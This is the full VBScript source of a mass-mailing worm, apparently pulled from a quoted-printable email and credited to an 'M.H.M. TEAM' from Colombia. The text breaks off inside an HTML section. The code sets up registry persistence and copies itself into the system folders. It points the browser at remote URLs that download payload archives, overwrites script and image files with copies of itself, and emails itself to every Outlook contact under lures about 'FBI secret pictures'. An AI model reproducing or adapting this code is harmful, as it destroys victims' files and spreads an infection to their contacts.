Thanks God..! rem A greeting for "Lina Mar=EDa" from "Santa fe de Bogot=E1" rem A greeting for "Tizo" from "Spain" rem And One kicked of tail to my friends, "eL ChE" and "ThE SpY" rem okay, ok...=20 rem my baby start here... =20 On Error Resume Next dim = fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow,polyn,numero,polye eq=3D"" ctr=3D0 randomize numero =3D Int(Rnd * 3) + 1 polye =3D ".GIF.vbs" If numero =3D 1 Then polye =3D ".BMP.vbs" Else If numero =3D 2 Then polye =3D ".JPG.vbs" End If End If polyn=3D"\"&polyname(Int(Rnd * 5) + 4)&polye Set fso =3D CreateObject("Scripting.FileSystemObject") set file =3D fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=3Dfile.ReadAll main() If Day(Now) =3D 17 And Month(Now) =3D 9 Then MsgBox "Dedicated to my best brother=3D>Christiam Julian(C.J.G.S.)" & = Chr(13) & "Att. " & polyname(5) & " (M.H.M. TEAM)" killnet() End If sub main() On Error Resume Next dim wscr,rr set wscr=3DCreateObject("WScript.Shell") rr=3Dwscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows = Scripting Host\Settings\Timeout") if (rr>=3D1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting = Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin =3D fso.GetSpecialFolder(0) Set dirsystem =3D fso.GetSpecialFolder(1) Set dirtemp =3D fso.GetSpecialFolder(2) Set c =3D fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\LINUX32.vbs") c.Copy(dirwin&"\reload.vbs") c.Copy(dirsystem&polyn) regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread,res regcreate = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\LINUX3= 2",dirsystem&"\LINUX32.vbs" regcreate = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService= s\reload",dirwin&"\reload.vbs" downread=3D"" downread=3Dregget("HKEY_CURRENT_USER\Software\Microsoft\Internet = Explorer\Download Directory") if (downread=3D"") then downread=3D"c:\" end if rem acepta nombres largos..? if (fileexist(dirsystem&"\WinFAT32.exe")=3D1) then Randomize Randomize num =3D Int((4 * Rnd) + 1) rem fatal =3D> send virii if num =3D 2 then=20 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start = Page","http://members.fortunecity.com/plancolombia/macromedia32.zip" else rem oh,, a picture.. nice :) =20 if num =3D 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start = Page","http://members.fortunecity.com/plancolombia/linux321.zip" =20 else rem oh,, other picture =3D:() if num =3D 4 then regcreate "HKCU\Software\Microsoft\Internet = Explorer\Main\Start = Page","http://members.fortunecity.com/plancolombia/linux322.zip" end if=20 end if =20 end if end if if (fileexist(downread&"\MACROMEDIA32.zip")=3D0) then res =3D Shell("copy " & downread & "\MACROMEDIA32.zip " & dirwin & = "\important_note.txt", vbHide) regcreate = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\plan = colombia",dirwin&"\important_note.txt" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet = Explorer\Main\Start Page","about:blank" else if (fileexist(downread&"\linux321.zip")=3D0) then Kill (dirwin & "\logos.sys") res =3D Shell("copy " & downread & "\linux321.zip " & dirwin & = "\logos.sys", vbHide) regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet = Explorer\Main\Start Page","about:blank" =20 else if (fileexist(downread&"\linux322.zip")=3D0) then Kill (dirwin & "\logow.sys") res =3D Shell("copy " & downread & "\linux322.zip " & dirwin & = "\logow.sys", vbHide) =20 regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet = Explorer\Main\Start Page","about:blank" =20 end if =20 end if end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc =3D fso.Drives For Each d in dc If d.DriveType =3D 2 or d.DriveType=3D3 Then folderlist(d.path&"\") end if Next listadriv =3D s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f =3D fso.GetFolder(folderspec) set fc =3D f.Files for each f1 in fc ext=3Dfso.GetExtensionName(f1.path) ext=3Dlcase(ext) s=3Dlcase(f1.name) if (ext=3D"vbs") or (ext=3D"vbe") then set ap=3Dfso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close else if(ext=3D"js") or (ext=3D"jse") or (ext=3D"css") or (ext=3D"wsh") or = (ext=3D"sct") or (ext=3D"hta") then set ap=3Dfso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=3Dfso.GetBaseName(f1.path) set cop=3Dfso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) =20 else if(ext=3D"jpg") or (ext=3D"jpeg") then set ap=3Dfso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=3Dfso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) =20 else if(ext=3D"mp3") or (ext=3D"mp2") then set mp3=3Dfso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=3Dfso.GetFile(f1.path) att.attributes=3Datt.attributes+2 end if end if end if end if next end sub sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f =3D fso.GetFolder(folderspec) set sf =3D f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub sub regcreate(regkey,regvalue) Set regedit =3D CreateObject("WScript.Shell") regedit.RegWrite regkey,regvalue end sub function regget(value) Set regedit =3D CreateObject("WScript.Shell") regget=3Dregedit.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg =3D 0 else msg =3D 1 end if fileexist =3D msg end function function folderexist(folderspec) On Error Resume Next dim msg if (fso.GetFolderExists(folderspec)) then msg =3D 0 else msg =3D 1 end if fileexist =3D msg end function sub spreadtoemail() On Error Resume Next dim = x,a,ctrlists,ctrentries,correoad,b,regedit,regv,regad,textosub,textobod set regedit=3DCreateObject("WScript.Shell") set out=3DWScript.CreateObject("Outlook.Application") set mapi=3Dout.GetNameSpace("MAPI") Randomize numero =3D Int(Rnd * 3) + 1 textosub =3D "" If numero =3D 1 Then textosub =3D "US PRESIDENT AND FBI SECRETS =3DPLEASE VISIT =3D> = (http://WWW.2600.COM)<=3D" Else If numero =3D 2 Then textosub =3D polyname(6) End If End If Randomize numero =3D Int(Rnd * 3) + 1 textobod =3D "" If numero =3D 1 Then textobod =3D "VERY JOKE..! SEE PRESIDENT AND FBI TOP SECRET = PICTURES.." Else If numero =3D 2 Then textobod =3D polyname(10) End If End If for ctrlists=3D1 to mapi.AddressLists.Count set a=3Dmapi.AddressLists(ctrlists) x=3D1 regv=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv=3D"") then regv=3D1 end if if (int(a.AddressEntries.Count)>int(regv)) then =20 for ctrentries=3D1 to a.AddressEntries.Count correoad=3Da.AddressEntries(x) regad=3D"" = regad=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&corr= eoad) if (regad=3D"") then set correo=3Dout.CreateItem(0) correo.Recipients.Add(correoad) correo.Subject =3D textosub correo.Body =3D vbcrlf&textobod correo.Attachments.Add(dirsystem&polyn) correo.Send regedit.RegWrite = "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&correoad,1,"REG_DWORD" end if x=3Dx+1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Addr= essEntries.Count else regedit.RegWrite = "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if next Set out=3DNothing Set mapi=3DNothing end sub Function polyname(n) Dim i, vector, texto, pos on error resume next rem polyformic ( ohhhh yeahhh...) very good polyformic engine :() by = Sand Ja9e Gr0w vector =3D Array("A", "E", "I", "O", "U") texto =3D "" Randomize For i =3D 1 To n Randomize rem consonante texto =3D texto&Chr(Int((Rnd * 25) + 65)) i =3D i + 1 If i > n Then exit for end if rem vocal texto =3D texto&vector(Int((Rnd * 4) + 1)) Randomize Next polyname =3D texto End Function sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1=3D""&_ ""&vbcrlf& _ "

M.H.M TEAM

Colombia
- Please press #-#YES#-# = button for see secret pictures"&vbcrlf& _ "Hello = Colombia...! Since Here, after, since other part of World.. = "&vbcrlf& _ ""&vbcrlf& _ "